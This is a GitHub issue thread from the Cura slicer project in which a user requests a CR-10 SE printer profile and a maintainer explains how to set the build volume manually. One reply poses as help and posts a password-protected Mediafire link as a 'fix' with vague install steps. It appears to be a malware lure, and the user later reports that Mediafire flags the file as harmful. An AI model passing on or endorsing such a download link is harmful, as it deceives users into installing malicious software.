Ultimaker/Cura #19590: Printer profile

PaulMaritz, 2024-08-27:
### Is your feature request related to a problem?

On Cura there is no printer for a CR-10 SE the bed size is 220 x 220 x 250

### Describe the solution you'd like

Can you please add the CR-10 SE profile for the printer.

### Describe alternatives you've considered

Non of the other printer have the same setting as the CR-10 SE printer.

### Affected users and/or printers

Yes everyone will benefit.

PaulMaritz, 2024-08-27:
Please add the printer CR-10 SE with bed size 220x220 250 settings profile on Cura please.

MirsonMboa, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

GregValiant, 2024-08-27:
The printer definitions must come from the community or from the manufacturer.  It isn't possible for UltiMaker to go out and buy one of every printer on the planet in order to create definitions for them.

Everything within a printer definition file can be changed in Cura.  Most settings are in the "Machine Settings" dialog and that is where you will find "X(Width)" and "Y(Depth)" and "Z(Height)".
For some hidden settings you need to load the "Printer Settings" plugin from the MarketPlace.  That is where you will find things like "Extruders Share Heater" or the "Maximum Acceleration" settings for each axis.
Here is where you set the build volume size:
[image]

I'll go ahead and close this as all the CR-10 definitions are close enough to the base CR-10 that minor changes in Cura can account for the differences.

PaulMaritz, 2024-08-27:
What does this file do because Mediafire is denying the download for this file because it is harmful.

https://app.mediafire.com/3ag3jpquii3of